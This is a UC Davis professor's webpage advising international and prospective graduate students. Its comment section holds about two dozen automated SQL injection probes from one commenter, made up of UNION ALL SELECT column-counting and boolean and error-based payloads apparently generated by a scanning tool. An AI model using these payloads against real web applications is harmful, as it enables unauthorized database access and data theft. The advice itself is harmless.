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Christian Nansen Phone: 530-752-0492 Briggs Hall, room 37 (basement)

International Students


Coming from a small country (Denmark), having studied abroad (Portugal) and taught at multiple universities in different countries – I am fully aware of most of the aspects and challenges with being an international student.

My first and most important comment is that I would strongly encourage all students to spend time abroad at some point of their career – either working or studying. Living abroad and successfully embedding yourself in a foreign culture is, in my view, one of the strongest and most convincing ways to show a future employer that you are a problem-solver, out-going, have cultural experience, that you can handle adverse situations – and a whole lot of other critically important skill sets.

When deciding on studying in a foreign country, many students select a university which already has many students from that country… That is both an advantage, but also a small risk. It is an advantage, because you can contact existing students and get good and first-hand feedback about what is like to study at that university. And I would certainly encourage that – your country may even have an association – like, the association of Brazilian/South American or Chinese students at UC Davis. You can contact them directly and get all sorts of information about housing, living costs, language training, social life etc – and I would strongly encourage that!

However, it is very important not to get too “sucked into” your own culture at the foreign university and make contacts and network outside your own culture. If you are Brazilian, and you come to Davis and live with 2-3 other Brazilians, play soccer with South Americans etc – your experience will be very limited. It is not easy, but you have to be prepared to actively pursue contact with fellow students and others with different cultural backgrounds – especially Americans. I would even argue that, unless you make friends with Americans during your study visit, you have not been able to take full advantage of the opportunity you were given as a foreign student.

As a foreign student, you have to understand that we professors receive many requests from prospective students. Many of them are generic and automated – I normally delete them even without reading carefully. So, if you are serious about wanting to contact me (and I guess most other potential supervisors), you have to make a convincing case. That means:

  • You have read some of my papers and my website and therefore have a general idea about the research I do.

  • You have identified an interesting and important research topic – don’t expect me to give you a well-defined project, and all you have to do is to execute!

  • You have included relevant references in the description of your project idea, so that it is clear that you can think critically and possess the basic understanding of a logic and sound experimental hypothesis.

4)      If you don’t have funding, you need to identify funding bodies, which might willing to support your project idea. You may need to identify specific programs within the funding body – like those funding minorities, specific training programs, specific research topics etc.

Your initial emails have to convince me about your capabilities in ALL four categories listed above for me to accept you as a student and work with you regarding your scholarship application. Finally, it is extremely important that you understand, that my role as your supervisor is NOT to tell you what to do. It will be YOUR project, and my role is to advise you and help you make the best possible decisions. In other words, don’t expect me to make the decisions for you – you come to me with options, and then we can discuss which of the options you should chose. The main reason for me having this philosophy is that I want my students to learn how to manage and feel ownership of their projects.

85 Responses so far.

  1. bSlF says:

    OiHz’) AND 3222=3222 AND (‘UCAd’ LIKE ‘UCAd

  2. bSlF says:

    OiHz’) AND 3403=CAST((CHR(113)||CHR(120)||CHR(113)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (3403=3403) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(122)||CHR(122)||CHR(113)) AS NUMERIC) AND (‘oFcC’ LIKE ‘oFcC

  3. bSlF says:


  4. bSlF says:


  5. bSlF says:


  6. bSlF says:

    OiHz’) UNION ALL SELECT 86,86,86,86,86,86,86,86,86,86,86,CONCAT(CONCAT(‘qxqzq’,’vxSfvzOiHonlLotFQFnvhuaRkgzNCLFnexCoDosm’),’qqzzq’),86,86– RgUT

  7. bSlF says:

    -7856′) UNION ALL SELECT 86,86,86,86,86,86,CONCAT(CONCAT(‘qxqzq’,’EoRGtuilTQFBmxisOFuFxlgVYhKZUiBZOBOhtgWj’),’qqzzq’),86,86,86,86,86,86,86– zRdP

  8. bSlF says:

    OiHz’) UNION ALL SELECT 86,86,86,86,86,CONCAT(CONCAT(‘qxqzq’,’lqycSMxxLwFntTprygptusIMEURfnKQGNDkzyaqm’),’qqzzq’),86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86– mxYk

  9. bSlF says:

    OiHz’) UNION ALL SELECT 86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,CONCAT(CONCAT(‘qxqzq’,’hNTvznmteL’),’qqzzq’),86,86,86,86,86,86,86,86,86,86,86,86– PUuN

  10. bSlF says:

    -9801′) UNION ALL SELECT 86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,CONCAT(CONCAT(‘qxqzq’,’NNpcIYtoFealDftaJfyLdQIjNCIsSRbzbXsqqSUs’),’qqzzq’)– BFIP

  11. bSlF says:

    -1688′) UNION ALL SELECT 86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86– iCSy

  12. bSlF says:

    OiHz’) UNION ALL SELECT 86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,CONCAT(CONCAT(‘qxqzq’,’TaYDtEPejnYDXYIZEwzHAUyQZMDMvPntsxRCgWTU’),’qqzzq’),86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86– KOKd

  13. bSlF says:

    OiHz’) UNION ALL SELECT 86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,CONCAT(CONCAT(‘qxqzq’,’xuqosxqPpu’),’qqzzq’),86,86,86,86,86,86,86,86,86,86,86,86,86,86,86– bgSg

  14. bSlF says:

    OiHz’) UNION ALL SELECT 86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,CONCAT(CONCAT(‘qxqzq’,’ZbDDohHdMi’),’qqzzq’),86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86– oyis

  15. bSlF says:

    -9372′) UNION ALL SELECT 86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,CONCAT(CONCAT(‘qxqzq’,’ARGrjOxJyjmYXHatsFyMGlChVqpaUnwggBlpAcLg’),’qqzzq’),86,86,86,86,86,86,86– PYQF

  16. bSlF says:

    -2109′) UNION ALL SELECT 86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,CONCAT(CONCAT(‘qxqzq’,’DiDiQQMfKo’),’qqzzq’),86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86– YXqj

  17. bSlF says:

    -4044′) UNION ALL SELECT 86,86,86,86,86,86,86,86,86,86,86,86,86,86,86#

  18. bSlF says:

    -7972′) UNION ALL SELECT 86,86,86,86,86,86,86,86,86,86,86,86,86,CONCAT(0x7178717a71,0x747377415a4169796e72694f626965534a7750514b6a6d704f485074424a58765648636f4248726e,0x71717a7a71),86,86#

  19. bSlF says:

    -1731′) UNION ALL SELECT 86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86#

  20. bSlF says:

    OiHz’) UNION ALL SELECT 86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,CONCAT(0x7178717a71,0x4a434769414f714e786d,0x71717a7a71),86,86,86,86,86#

  21. bSlF says:

    -4826′) UNION ALL SELECT 86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,CONCAT(0x7178717a71,0x6e4871586344616b746f697647736d627343566c616f476b74716f486d79704a4858554b55764d55,0x71717a7a71)#

  22. bSlF says:

    -7838′) UNION ALL SELECT 86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86#

  23. bSlF says:

    OiHz’) UNION ALL SELECT 86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,CONCAT(0x7178717a71,0x634e47435341764c514f4a6f4e444f786f4c435778574450426e684245444a4b78414a4365644d4f,0x71717a7a71),86#

  24. bSlF says:

    OiHz’) UNION ALL SELECT 86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,CONCAT(0x7178717a71,0x53656644616a504c4b74,0x71717a7a71),86,86,86,86,86,86#

  25. bSlF says:

    OiHz’) UNION ALL SELECT 86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,CONCAT(0x7178717a71,0x72685a7258636871644e,0x71717a7a71),86,86#

  26. bSlF says:

    -5512′) UNION ALL SELECT 86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,CONCAT(0x7178717a71,0x564d5943626c5a66796647414971536457584d6763504e754a744e78446559556f7871706b6f7a52,0x71717a7a71),86,86,86,86,86,86,86,86,86,86,86#

  27. bSlF says:

    -3169′) UNION ALL SELECT 86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,CONCAT(0x7178717a71,0x7669647352466c655064,0x71717a7a71),86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86#

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